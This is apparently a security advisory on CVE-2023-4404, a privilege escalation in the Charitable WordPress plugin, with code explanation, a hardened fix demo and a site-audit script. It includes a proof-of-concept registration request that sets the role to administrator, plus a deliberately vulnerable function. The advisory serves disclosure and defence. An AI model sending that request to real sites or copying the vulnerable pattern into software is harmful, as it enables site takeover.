Introduction: Security researchers have identified a vulnerability in the Donation Forms by Charitable plugin for WordPress. The plugin is widely installed, so a significant number of WordPress sites may be at risk. The vulnerability (CVE-2023-4404) is a privilege escalation issue: an unauthenticated attacker can choose their own user role while registering through the plugin and thereby obtain administrator permissions.

Plugin Details

Name: Donation Forms by Charitable
Creator: WP Charitable
Plugin Link: https://wordpress.org/plugins/charitable/
Versions Affected: <= 1.7.0.12

Vulnerability Explanation: The privilege escalation exists because the plugin's 'update_core_user' function does not restrict which user fields a registration request may set. A caller-supplied 'role' value is passed straight through to WordPress without checking whether the caller is allowed to assign roles at all. An unauthenticated attacker can therefore submit a 'role' parameter during registration and be created with a higher privileged role such as administrator.

Code Snippet

In the vulnerable version of the plugin, the 'update_core_user' function copies the 'role' value from the request into the user data with no capability check (the '...' marks code omitted from the excerpt):

function update_core_user( $user_id, $values ) {
    ...
    // No capability check here: whatever 'role' the request supplied is
    // written straight into the user record.
    if ( isset( $values['role'] ) ) {
        $user_data['role'] = $values['role'];
    }
    ...
    wp_update_user( $user_data );
}
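As an added example (this is neither the plugin's own code nor the vendor's patch), the vulnerable pattern from the snippet above is shown beside a hardened version, with small stand-ins for the WordPress functions it calls so the file runs under plain `php` without a WordPress install. The stub user table, the capability list, `example_role_exists()` (standing in for `wp_roles()->is_role()`) and the function names are assumptions for this example; `wp_update_user()` and `current_user_can()` are the real WordPress functions being imitated.

```php
<?php
// Added example, not code from the Charitable plugin: the vulnerable
// pattern next to a hardened version, with minimal stubs for the
// WordPress functions involved so this file runs under plain `php`.

// --- stubs standing in for WordPress (constructed for this example) ---
$GLOBALS['example_users'] = array( 7 => array( 'ID' => 7, 'role' => 'subscriber' ) );
$GLOBALS['example_caps']  = array();   // capabilities of the "current user"; empty = unauthenticated

function wp_update_user( $user_data ) {
    $id = (int) $user_data['ID'];
    $GLOBALS['example_users'][ $id ] = array_merge( $GLOBALS['example_users'][ $id ], $user_data );
    return $id;
}
function current_user_can( $cap ) {
    return in_array( $cap, $GLOBALS['example_caps'], true );
}
function example_role_exists( $role ) {   // stands in for wp_roles()->is_role( $role )
    return in_array( $role, array( 'subscriber', 'contributor', 'author', 'editor', 'administrator' ), true );
}

// --- vulnerable pattern: the role is copied straight from request data ---
function update_core_user_vulnerable( $user_id, $values ) {
    $user_data = array( 'ID' => $user_id );
    if ( isset( $values['role'] ) ) {
        $user_data['role'] = $values['role'];
    }
    return wp_update_user( $user_data );
}

// --- hardened version: a role is accepted only from a caller allowed to assign it ---
function update_core_user_hardened( $user_id, $values ) {
    $user_data = array( 'ID' => $user_id );

    // Allowlist the fields a registrant may set. Anything else in $values,
    // 'role' included, is ignored unless it passes the explicit check below.
    foreach ( array( 'first_name', 'last_name', 'display_name' ) as $field ) {
        if ( isset( $values[ $field ] ) ) {
            $user_data[ $field ] = $values[ $field ];
        }
    }

    // Honour 'role' only when the current session holds 'promote_users'
    // (the capability WordPress itself requires for a role change) and the
    // role exists. An unauthenticated registrant fails the first test, so the
    // user keeps the role wp_insert_user() gave it (the site default).
    if ( isset( $values['role'] )
         && current_user_can( 'promote_users' )
         && example_role_exists( $values['role'] ) ) {
        $user_data['role'] = $values['role'];
    }

    return wp_update_user( $user_data );
}

// --- demonstration: the same request body against both versions ---
$request = array( 'display_name' => 'attacker', 'role' => 'administrator' );

update_core_user_vulnerable( 7, $request );
printf( "vulnerable: role = %s\n", $GLOBALS['example_users'][7]['role'] );

$GLOBALS['example_users'][7]['role'] = 'subscriber';   // reset for the next run
update_core_user_hardened( 7, $request );
printf( "hardened (unauthenticated): role = %s\n", $GLOBALS['example_users'][7]['role'] );

$GLOBALS['example_caps'] = array( 'promote_users' );   // simulate an administrator session
update_core_user_hardened( 7, $request );
printf( "hardened (promote_users): role = %s\n", $GLOBALS['example_users'][7]['role'] );
```

The design point is that the fix is not to validate the role string but to stop trusting the request for that field at all: role assignment is tied to a capability of the acting session, and the registration path, where the session is anonymous, can never satisfy it. Run with `php example.php` and compare the three lines: the vulnerable path ends with the attacker's chosen role, the hardened path changes the role only once the session carries 'promote_users'.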

Exploitation: register a new user with the 'role' parameter set to 'administrator' in the registration request. The request below shows the idea as this page presents it; the vulnerable input is the 'role' field of the registration submission:

POST /wp-json/charitable/v1/registration HTTP/1.1
Host: vulnerable.website
Content-Type: application/json
Content-Length: 94

{
  "email": "attacker@example.com",
  "password": "abcd1234",
  "role": "administrator"
}

If the request is accepted, the attacker now holds an administrator account on the site and can use it to take full control, for example by installing plugins, editing theme files or creating further accounts.

Mitigation: Update the Donation Forms by Charitable plugin to the latest version. The issue has been patched in version 1.7.0.13, so any installation at 1.7.0.12 or earlier should be updated. Because the flaw allows account creation, updating alone does not undo an earlier compromise: also review the site's administrator accounts for any that were not created by a legitimate administrator.
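As an added example (not part of the original advisory or of the plugin), the following script performs the two checks a site owner would want after reading the mitigation above: whether the installed plugin version is still in the affected range, and which administrator accounts exist and when they were registered. It is meant to be run with WP-CLI as `wp eval-file charitable-check.php`. It assumes the plugin's main file is `charitable/charitable.php` under WP_PLUGIN_DIR and that 1.7.0.13 is the first fixed release, as stated above; the file name and the output wording are assumptions for this example.

```php
<?php
// Added example, not code from the advisory or the plugin. Run with:
//   wp eval-file charitable-check.php
// Assumption: the plugin's main file lives at charitable/charitable.php.

require_once ABSPATH . 'wp-admin/includes/plugin.php';

$first_fixed = '1.7.0.13';
$plugin_file = WP_PLUGIN_DIR . '/charitable/charitable.php';

// 1. Is the installed version still in the affected range (<= 1.7.0.12)?
if ( file_exists( $plugin_file ) ) {
    $data       = get_plugin_data( $plugin_file, false, false );
    $vulnerable = version_compare( $data['Version'], $first_fixed, '<' );
    WP_CLI::log( sprintf(
        'Charitable %s installed: %s',
        $data['Version'],
        $vulnerable ? 'VULNERABLE (update required)' : 'patched'
    ) );
} else {
    WP_CLI::log( 'Charitable not found under ' . WP_PLUGIN_DIR );
}

// 2. Regardless of version, list every administrator, newest first.
//    Self-registered users normally receive the site's default role, so an
//    administrator whose registration date falls inside the exposure window
//    and whom nobody remembers creating deserves a closer look.
WP_CLI::log( 'Site default role for new registrations: ' . get_option( 'default_role' ) );

$admins = get_users( array(
    'role'    => 'administrator',
    'orderby' => 'registered',
    'order'   => 'DESC',
) );

$rows = array();
foreach ( $admins as $u ) {
    $rows[] = array(
        'ID'         => $u->ID,
        'user_login' => $u->user_login,
        'user_email' => $u->user_email,
        'registered' => $u->user_registered,
    );
}
WP_CLI\Utils\format_items( 'table', $rows, array( 'ID', 'user_login', 'user_email', 'registered' ) );
```

The version check uses `version_compare()` rather than string comparison so that four-component versions such as 1.7.0.12 and 1.7.0.13 order correctly. The account listing is deliberately not filtered by date: the registration date is shown so that the reviewer can decide which accounts are suspicious, rather than the script guessing an exposure window it cannot know.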

Original References

- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4404
- WPScan Vulnerability Database: https://wpscan.com/vulnerability/520ee3a6-3108-45f4-bd7a-9df0806dc3cb

Conclusion: Keep WordPress plugins up to date and check regularly for security patches. Avoid outdated or unmaintained plugins where possible, and stay informed about newly disclosed issues. This vulnerability is a reminder that any code path which writes caller-supplied data into a user record must enforce the same capability checks WordPress core applies, and that plugins such as Donation Forms by Charitable need to be treated as part of the site's attack surface.

Timeline

Published on: 08/23/2023 02:15:00 UTC
Last modified on: 08/28/2023 20:46:00 UTC